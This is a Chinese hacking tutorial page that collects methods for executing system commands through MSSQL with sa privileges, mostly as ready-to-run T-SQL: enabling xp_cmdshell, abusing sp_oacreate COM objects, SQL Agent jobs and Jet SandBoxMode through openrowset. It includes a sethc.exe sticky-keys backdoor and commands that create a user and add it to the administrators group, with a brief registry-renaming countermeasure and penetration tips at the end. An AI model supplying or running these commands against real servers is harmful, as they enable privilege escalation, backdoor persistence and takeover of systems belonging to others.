mssql的sa权限执行命令方法总结                
                
                    所属分类:
                        网络安全 / 黑客教程                    
                    阅读数:
                        96
                    
                        收藏 0赞 0分享
                    
                 
                
                     测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动) 
  一.xp_cmdshell 
  EXEC master..xp_cmdshell ‘ipconfig’ 
  开启xp_cmdshell: 
  – To allow advanced options to be changed. 
  EXEC sp_configure ’show advanced options’, 1 
  GO 
  – To update the currently configured value for advanced options. 
  RECONFIGURE 
  GO 
  – To enable the feature. 
  EXEC sp_configure ‘xp_cmdshell’, 1 
  GO 
  – To update the currently configured value for this feature. 
  RECONFIGURE 
  GO 
  二.sp_oacreate 
  创建wscript.shell对象 
  use master declare @o int exec sp_oacreate ‘wscript.shell’,@o out exec sp_oamethod @o,‘run’,null,‘cmd /c "net user" > c:\test.tmp’ 
  创建scripting.filesystemobject对象 
  declare @o int 
  exec sp_oacreate ’scripting.filesystemobject’, @o out 
  exec sp_oamethod @o, ‘copyfile’,null,‘c:\windows\explorer.exe’ ,‘c:\windows\system32\sethc.exe’; 
  declare @oo int 
  exec sp_oacreate ’scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,‘c:\windows\system32\sethc.exe’ ,‘c:\windows\system32\dllcache\sethc.exe’; 
  可以用utilman.exe代替sethc.exe达到同样的效果 后门很酷吗,呵呵 
  创建Shell.Application对象 
  declare @o int 
  exec sp_oacreate ‘Shell.Application’, @o out 
  exec sp_oamethod @o, ‘ShellExecute’,null, ‘cmd.exe’,‘cmd /c net user >c:\test.txt’,‘c:\windows\system32′,”,1; 
  开启OLE Automation Procedures 
  sp_configure ’show advanced options’, 1; 
  GO 
  RECONFIGURE; 
  GO 
  sp_configure ‘Ole Automation Procedures’, 1; 
  GO 
  RECONFIGURE; 
  GO 
  我们的对策就是把对象做一下手脚 
  WScript.Shell可以调用系统内核运行DOS基本命令 
  可以通过修改注册表,将此组件改名,来防止危害。 
  HKEY_CLASSES_ROOT\WScript.Shell\ 
  及HKEY_CLASSES_ROOT\WScript.Shell.1\ 
  改名为其它的名字,如:改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName 
  自己以后调用的时候使用这个就可以正常调用此组件了 
  也要将clsid值也改一下 
  HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值 
  HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值 
  同wscript.shell理、scripting.filesystemobject、Shell.Application 
  三.JOB 
  利用JOB执行命令,有一个先决条件就是开启SQLSERVERAGENT服务,下面的语句可以开启 
  exec master.dbo.xp_servicecontrol ’start’,'SQLSERVERAGENT’ 
  use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null,‘x’ exec sp_add_job ‘x’ exec 
  sp_add_jobstep null,‘x’,null,‘1′,‘cmdexec’,‘cmd /c "net user>c:\test.test"’ exec sp_add_jobserver 
  null,‘x’,@@servername exec sp_start_job ‘x’; 
  四.SandBoxMode(网上常说的沙盒模式) 
  原理:在access里调用VBS的shell函数,以system权限执行任何命令。但是试用这个函数之前必须把注册表里的一个叫SandBoxmode的开关打开, 
  注册表:HKEY_LOCAL_MACHINE\SoFtWare\Micris 
  oft\Jet\4.0\Engine\SandBoxmode.默认值为2,这个人键值为0表示始 
  终禁用SandBoxmode模式,1表示对于非Acess应用程序试用SandBoxmode模式,2表示对access应用程序使用SandBoxmode模式,3则表示完全开启安全设置。//1或0都可以执行命令 
  EXEC sp_addlinkedserver ‘testsql’,'OLE DB Provider for Jet’,'Microsoft.Jet.OLEDB.4.0′,’c:\windows\system32\ias\ias.mdb’ 
  exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Jet\4.0\Engines’,‘SandBoxMode’,‘REG_DWORD’,1 
  EXEC master..xp_regread HKEY_LOCAL_MACHINE ,‘Software\Microsoft\Jet\4.0\engines’,‘SandBoxMode’ 
  select * from openrowset(‘microsoft 
  .jet.oledb.4.0′,‘;database=c:\windows\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user test test /add")’) 
  select * from openrowset(‘microsoft.jet.oledb.4.0′, 
  ‘;database=c:\windows\system32\ias\ias.mdb’,’select shell("cmd.exe /c net localgroup administrators test /add")’) 
  下面是系统自带的两个mdb文件 
  C:\WINDOWS\system32\ias\dnary.mdb 
  C:\WINDOWS\system32\ias\ias.mdb 
  总结 
  上述几种方法(仔细看看我都忘记有几种了,哈哈。你可以发散思维,再找出来几种)都是在默认情况下测试的,往往渗透的时候有很多限制条件,我们可以逐一克服,利用组件得到服务器信息,读取、创建文件了等等,我们还是要对权限这个词组有深层次的理解啊。 
  附注 
  关于*.exe c:\windows\system32\ 还有c:\windows\system32\dllcache呢 
  关于cmd.exe还有command.exe呢 
  关于net.exe还有net1.exe呢 
  Mdb文件不存在我们可以上传一个啊 
  执行命令的组件不是只有一个哦 
                                    
             
            
                
                CSRF的攻击方式详解 黑客必备知识
CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF
                    
                    收藏 0赞 0分享
抓取管理员hash值(哈希)的另类方法
哈希算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计
                    
                    收藏 0赞 0分享
网站安全教程 绕过D盾进行注入的方法(图文教程)
D盾_IIS防火墙专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
                    
                    收藏 0赞 0分享
局域网安全教程 HSRP攻击和防范的方法介绍(图文教程)
热备份路由器协议(HSRP)的设计目标是支持特定情况下 IP 流量失败转移不会引起混乱、并允许主机使用单路由器,以及即使在实际第一跳路由器使用失败的情形下仍能维护路由器间的连通性。换句话说,当源主机不能动态知道第一跳路由器的 IP 地址时,HSRP 协议能够保护第一
                    
                    收藏 0赞 0分享
SQL通用防注入系统asp版漏洞
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
                    
                    收藏 0赞 0分享
                 查看更多